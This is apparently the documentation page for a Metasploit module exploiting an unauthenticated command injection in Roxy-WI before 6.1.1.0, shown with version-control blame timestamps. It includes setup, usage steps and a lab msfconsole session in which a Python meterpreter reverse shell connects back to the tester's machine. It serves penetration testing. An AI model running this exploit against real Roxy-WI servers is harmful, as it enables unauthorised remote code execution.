2022-07-19 21:08:45 +03:00
|
|
|
## Vulnerable Application
|
|
|
|
|
|
2022-07-22 12:24:26 +00:00
|
|
|
This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0.
|
|
|
|
|
Successful exploitation results in remote code execution under the context of the web server user.
|
2022-07-19 21:08:45 +03:00
|
|
|
|
|
|
|
|
### Setup
|
|
|
|
|
|
2022-07-21 11:42:18 +00:00
|
|
|
Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.
|
2022-07-19 21:08:45 +03:00
|
|
|
|
2022-07-22 12:51:40 +00:00
|
|
|
https://roxy-wi.org/installation.py#manual
|
2022-07-19 21:08:45 +03:00
|
|
|
|
|
|
|
|
```
|
|
|
|
|
git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
|
|
|
|
|
chmod +x haproxy-wi/app/*.py
|
|
|
|
|
sudo ./haproxy-wi/app/create_db.py
|
|
|
|
|
chown -R www-data:www-data haproxy-wi
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
## Verification Steps
|
|
|
|
|
|
|
|
|
|
1. Install the application
|
|
|
|
|
2. Start msfconsole
|
2022-07-19 15:44:52 -05:00
|
|
|
3. Do: `use exploit/linux/http/roxy_wi_exec`
|
2022-07-22 12:51:40 +00:00
|
|
|
4. Set `RHOST` to the address of the target Roxy-WI machine.
|
|
|
|
|
5. Set `LHOST` to the address of your attacking machine.
|
2022-07-19 21:08:45 +03:00
|
|
|
8. Run `exploit`
|
|
|
|
|
9. Do: `run`
|
2022-07-22 12:51:40 +00:00
|
|
|
10. You should get a shell as the user running the Roxy-WI server.
|
2022-07-19 21:08:45 +03:00
|
|
|
|
2022-07-25 16:03:09 +00:00
|
|
|
## Targets
|
|
|
|
|
|
|
|
|
|
### 0
|
|
|
|
|
|
|
|
|
|
This executes a Unix command.
|
|
|
|
|
|
|
|
|
|
### 1
|
|
|
|
|
|
|
|
|
|
This uses a Linux dropper to execute code.
|
|
|
|
|
|
2022-07-21 11:42:18 +00:00
|
|
|
## Options
|
2022-07-19 21:08:45 +03:00
|
|
|
|
2022-07-21 11:42:18 +00:00
|
|
|
### TARGETURI
|
2022-07-25 16:03:09 +00:00
|
|
|
|
|
|
|
|
Set `TARGETURI` if the Roxy-WI is installed at a custom path.
|
2022-07-19 21:08:45 +03:00
|
|
|
|
|
|
|
|
## Scenarios
|
|
|
|
|
|
2022-07-25 16:03:09 +00:00
|
|
|
### Roxy-WI 6.1.1.0 Ubuntu 20.04 GNU/Linux (x86_64)
|
2022-07-19 21:08:45 +03:00
|
|
|
|
|
|
|
|
```
|
2022-07-25 16:03:09 +00:00
|
|
|
Apache/2.4.52
|
|
|
|
|
MySQL 8.0.29
|
|
|
|
|
Python 3.10.4
|
|
|
|
|
```
|
2022-07-19 21:08:45 +03:00
|
|
|
|
|
|
|
|
```
|
2022-07-25 16:03:09 +00:00
|
|
|
msf6 > use exploit/linux/http/roxy_wi_exec
|
2022-07-21 11:42:18 +00:00
|
|
|
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
|
2022-07-19 15:44:52 -05:00
|
|
|
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
|
2022-07-19 21:08:45 +03:00
|
|
|
RHOST => 192.168.56.116
|
2022-07-19 15:44:52 -05:00
|
|
|
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
|
2022-07-19 21:08:45 +03:00
|
|
|
LHOST => 192.168.56.1
|
2022-07-25 16:03:09 +00:00
|
|
|
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
|
|
|
|
|
RPORT => 443
|
2022-07-21 11:42:18 +00:00
|
|
|
msf6 exploit(linux/http/roxy_wi_exec) > run
|
2022-07-19 21:08:45 +03:00
|
|
|
|
|
|
|
|
[*] Started reverse TCP handler on 192.168.56.1:4444
|
2022-07-21 11:42:18 +00:00
|
|
|
[*] Running automatic check ("set AutoCheck false" to disable)
|
|
|
|
|
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
|
2022-07-25 16:03:09 +00:00
|
|
|
[*] Executing Automatic for cmd/unix/python/meterpreter/reverse_tcp
|
|
|
|
|
[*] Sending stage (40168 bytes) to 192.168.56.116
|
|
|
|
|
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:56156) at 2022-07-25 18:49:54 +0300
|
2022-07-19 21:08:45 +03:00
|
|
|
|
2022-07-25 16:03:09 +00:00
|
|
|
meterpreter >
|
2022-07-19 15:44:52 -05:00
|
|
|
```
|
